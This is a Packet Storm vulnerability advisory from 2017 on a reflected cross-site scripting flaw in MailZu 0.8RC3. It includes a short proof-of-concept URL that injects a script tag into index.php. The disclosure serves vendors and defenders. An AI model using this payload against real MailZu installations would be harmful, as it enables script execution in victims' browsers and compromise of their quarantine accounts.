MailZu version 0.8RC3 suffers from a cross site scripting vulnerability.
28eb94c8022d315a9ae75af66ca16756dec140e761ca782ab425a2c6957e5f79[+]###################################################################################################
[+] Title: MailZu 0.8RC3 - Reflected Cross Site Scripting
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: wassline@gmail.com
[+] Author Company: Henceforth
[+]###################################################################################################
Vendor:
===============
https://sourceforge.net/
Product:
===============
0.8RC3
Download:
===========
https://sourceforge.net/projects/mailzu/files/mailzu/
MailZu is a simple and intuitive web interface to manage Amavisd-new quarantine. Users can view their own quarantine, release/delete messages or request the release of messages.
Vulnerability Type:
======================================
Reflected Cross Site Scripting.
CVE Reference:
===============
N/A
Tested on:
===============
Windows 7
Apache/2.4.23 (Win64)
Exploit/POC:
============
1) navigate the server http://server/index.php
2) inject the XSS Payload : http://server/index.php/"><script>alert(1);</script>
3) Done!
Network Access:
===============
Remote
Impact:
=================
Execute malicious scripts
Severity:
===========
High
Disclosure Timeline:
=====================
January 18, 2017 : Public Disclosure
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed